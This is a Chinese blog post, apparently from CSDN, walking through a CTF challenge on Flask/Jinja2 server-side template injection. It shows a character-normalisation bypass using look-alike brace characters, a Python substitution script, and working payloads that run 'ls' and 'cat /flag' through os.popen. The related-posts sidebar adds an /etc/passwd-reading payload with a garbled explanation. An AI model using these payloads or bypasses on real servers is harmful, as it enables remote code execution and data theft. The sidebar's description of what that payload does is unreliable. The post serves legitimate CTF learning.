新版攻防世界easy_web-web进阶ssti绕过(太湖杯)

最新推荐文章于 2024-06-05 21:44:07 发布
最新推荐文章于 2024-06-05 21:44:07 发布
阅读量1.7k 收藏 12
点赞数 2
分类专栏: WEB刷题记录 攻防世界 flask-ssti 文章标签: flask 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuanxu8877/article/details/128101173
版权

XCTF进阶 - easy_web (太湖杯)


打开网页,发现是一个字符规范器,首先有输入框,尝试注入


尝试后发现没有任何反应,此时没有其他思路了,抓包看看回显。

抓包发现竟然是python,此时想到为flask ssti模板注入,首先测试


发现{}被限制了,本网页的功能是字符规范,我们可以找一些相近的字符,让他规范成{}.

如图,我们找到了不一样的{},

可以发现,︷︸已经被格式化,我们测试下是否有ssti注入漏洞

输入︷︷2*2︸︸可以看到2*2被计算出来了,所以存在ssti,直接输入payload即可:
非常好用的ssti模板注入payload
{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}
此时有两种绕过方法

传参实现绕过

运用request.args实现绕过

特殊字符绕过

直接上脚本
ssti特殊字符绕过脚本

"""
{ -> ︷/﹛
} -> ︸/﹜
' -> '
, -> ,
" -> "
"""
//此时的str即你要输入的payload
str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串
# 如果需要替换replace(被替换的字符,替换后的字符)
str = str.replace('{', '︷')
str = str.replace('}', '︸')
str = str.replace('\'', ''')
str = str.replace('\"', '"')

print(str)

paylaod替换后为
︷︷a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")︸︸

查找flag

paylaod
︷︷a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls /').read()")︸︸

在根目录下发现flag
paylaod替换后为
︷︷a.__init__.__globals__.__builtins__.eval("__import__('os').popen('cat /flag').read()")︸︸

sean7777777
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
深入理解SSTI. 攻防世界easy_web 附python脚本
shshsj11的博客
04-19 304
这些对象可以被读取和修改,接下来介绍 __builtins__ 是 Python 中一个内置的模块对象,他在python解释器启动时, __builtins__ 对象就会被创建并且自动添加到全局命名空间中,因此 __builtins__ 可以在认可地方访问, __builtins__ 模块包含了很多内置函数,其中就包括我们这提要用的open(),所以我们通过__globals__来访问 __builtins__ 模块中的open函数来达到读取flag文件的目的,记录下第一次自己写脚本。
攻防世界--easy_web
qq_44418229的博客
07-25 2073
SSTI---利用特殊字符进行绕过;对SSTI的补充
攻防世界——easy_web详解
最新发布
chinese_cabbage0的博客
06-05 376
文章很好的解释了ssti注入的原理和攻防世界easy_web这个题目的详细解答
【愚公系列】2023年06月 攻防世界-Webeasy_web
时光隧道
06-16 4204
SSTI模板注入是一种特殊的代码注入攻击,在使用模板引擎的Web应用程序中广泛存在。攻击者通过输入恶意数据,触发模板引擎解析执行攻击代码,从而控制应用程序并获取敏感信息。以下是一个基于Jinja2模板引擎的SSTI模板注入攻击案例:1、首先,攻击者访问目标网站并找到一个可以利用的输入点,如搜索框或评论框等。该代码将显示应用程序的配置项。通过SSTI模板注入攻击,攻击者可以轻松地获取应用程序的敏感信息并最终控制服务器。因此,开发人员应该采取必要的安全措施,防止SSTI模板注入攻击。
攻防世界easy_web
qq_63928796的博客
07-22 1053
function需要自己寻找正在上传…重新上传取消︷︷().
【愚公系列】2023年05月 攻防世界-Web(very_easy_sql)
时光隧道
05-27 7830
SSRF(Server Side Request Forgery)是一种安全漏洞,攻击者可以利用该漏洞远程发送请求,使得目标服务器处理攻击者指定的请求,而不是合法的请求。攻击者可以利用此漏洞,访问受保护的资源,或者从外部网络中执行任意命令。Gopher协议是一种用于访问互联网资源的协议,通过gopher协议可以访问各种不同类型的协议,包括http、ftp、SMTP等。攻击者可以利用gopher协议来构造恶意请求,从而利用SSRF漏洞攻击目标系统。
【愚公系列】2023年05月 攻防世界-Webeasyphp)
时光隧道
05-25 8169
在 PHP 中,如果数字字符串和数字进行比较,会自动将数字字符串转换为数字。例如,“10” == 10 返回 true。但是,如果使用 === 进行比较(类型和数值都相等),则会返回 false,因为它们不是严格相等的。因此,在进行比较时,需要注意值的类型。
攻防世界easy_webSSTI注入
m0_66935689的博客
07-29 227
昨天不是放假了嘛想着做几道题的刚好碰到个文件上传的条件竞争整半天头都整大了,网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它题把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
Server-Side Template Injection (SSTI) 是一种严重的网络安全漏洞,尤其在现代Web应用程序中,它可能导致远程代码执行(RCE)。2015年,James Kettle在黑帽大会上详细阐述了这种攻击方式,强调了它如何被误认为是跨...
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
题目讲解3
aetlypdlg_ys的博客
05-18 391
id等于这玩意儿是因为$_SESSION['tokennum']没有什么东西,就直接让id=md5($_SESSION['tokennum'])就行,d41d8cd98f00b204e9800998ecf8427e这一串就是$_SESSION['tokennum']的md5加密。potin1k就是绕过addslashes,构造查看ae86qfC.php的内容。1{${highlight_file( 中的1是为了满足 if (intval,只要是数字开头的字符串就会返回数字,如果是纯字符串返回0。
攻防世界-web- easyphp
32bin的博客
10-30 1214
最近在学习CTF web相关知识,顺带学习php,在攻防世界平台上做做题。遇到了一道名为easyphp的题目,对我这个新手一点也不easy,于是决定把过程记录下来。版权声明:本文为CSDN博主「weixin_46906325」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/weixin_46906325/article/details/127154789。#攻防世界-web- easyphp。依次构造a、b、c的值!
XCTF-easy_web
qq_43465336的博客
08-20 158
参考:https://blog.csdn.net/qq_59950255/article/details/123215817。找一些特殊字符看看字符规范器效果和能不能找到能规范成{{}}的特殊字符。抓包中返回python版本,可能存在flask_ssti模板注入。但需将受限字符先转为特殊字符,使用python脚本完成上述处理。加引号尝试注入,有报错提示引号是不准使用的字符。1+1的代码执行了,存在ssti模板注入漏洞。输入{{11}}发现{{}}被过滤。找到特殊字符︷︷︸︸。好用的payload。
2020太湖物联网安全大赛easy-app的wp
sln_1550的博客
11-10 845
打开apk发现有native库,直接把so拖入ida,分析主程序如下: 首先输入的字符串判断是否是flag{xxxx}的形式,而且总长度是否为38,不是则报错退出 然后中间32字节经过check1函数处理,进行0-15位和16-31的高位互换, 然后再经过一个标准TEA加密 这里的key是假的: 调试的时候才发现实际是这样的: 原来是JNI_Onload的时候才修改掉。 然后就是base64encode,再和固定字符串比较,相等表示成功。 但是这里的base64encode是魔改的: 3-&
Web安全攻防世界05 easyphp(江苏工匠
weixin_42789937的博客
12-04 4000
Web安全攻防世界05 easyphp(江苏工匠),呃...我php0基础,自己解题,所以写得会很啰嗦...内容对小白依然非常友好~
[青少年CTF] easy_web 详解+避坑
明裕学长的博客
03-13 4509
这里坑就来了我们需要使用hackbar先进行一次post传递搭配burp抓包。希望小伙伴们可以一步一步的复现而不是直接填flag那样是没有效果滴!注意这里的回显结果不能出现md5 is funny ~发现它经过了两次base64编码和一次十六进制编码。我们反向操作一波查看index.php的源码。这里可以将img=删除因为我们已经绕过了。这里的%20是url编码是空格。下面在搭配../进行目录遍历。接着我们将post参数替换成。这让我联想到地址栏中的参数。下面我们进行了l\s绕过。解开后发现是图片源码。
web python template injection_攻防世界-Web_python_template_injection详解
05-26
Web Python Template Injection 是一种常见的 Web 漏洞类型,通常缩写为 SSTI(Server Side Template Injection)。该漏洞是由于 Web 应用程序未正确处理用户输入导致的,攻击者可以通过构造恶意输入来执行任意代码或获取敏感信息。 Python 作为一种流行的 Web 开发语言,广泛应用于 Web 应用程序中。Python Web 框架(如 Flask、Django 等)通常使用模板引擎来生成动态内容。在模板引擎中,可以使用变量、表达式、条件语句、循环语句等功能来生成动态内容。然而,如果在模板引擎中直接使用用户输入作为变量或表达式的一部分,而没有对用户输入进行适当的验证和过滤,就可能导致模板注入漏洞。 例如,在 Flask 应用程序中,可以使用 Jinja2 模板引擎来生成动态内容。如果在模板中使用了用户输入的变量,攻击者可以构造恶意输入来执行任意代码。例如,以下代码中的 name 变量可能是用户输入的: ```python from flask import Flask, render_template, request app = Flask(__name__) @app.route('/') def index(): name = request.args.get('name', '') return render_template('index.html', name=name) if __name__ == '__main__': app.run(debug=True) ``` 在 index.html 中,可以使用 {{ name }} 来显示用户输入的 name 变量。如果攻击者在 name 中注入了模板代码,就可能导致模板注入漏洞。例如,攻击者可以构造如下的输入: ``` {{ ''.__class__.__mro__[1].__subclasses__()[414]('/etc/passwd').read() }} ``` 这段代码在模板引擎中会被解释为调用 Python 的 subprocess.Popen 函数执行命令 /etc/passwd,并读取其输出。攻击者可以通过这种方式执行任意代码,获取敏感信息或者直接控制服务器。 为了防止 SSTI 漏洞,开发人员应该对用户输入进行严格的验证和过滤,避免在模板引擎中直接使用用户输入作为变量或表达式的一部分。可以使用 Python 的安全模板引擎(如 jinja2-sandbox、jinja2-timeout 等)来限制模板执行的权限,或者使用模板引擎提供的安全过滤器(如 escape、safe 等)来过滤用户输入。此外,还应该及时更新 Web 应用程序和相关组件,以避免已知的漏洞攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值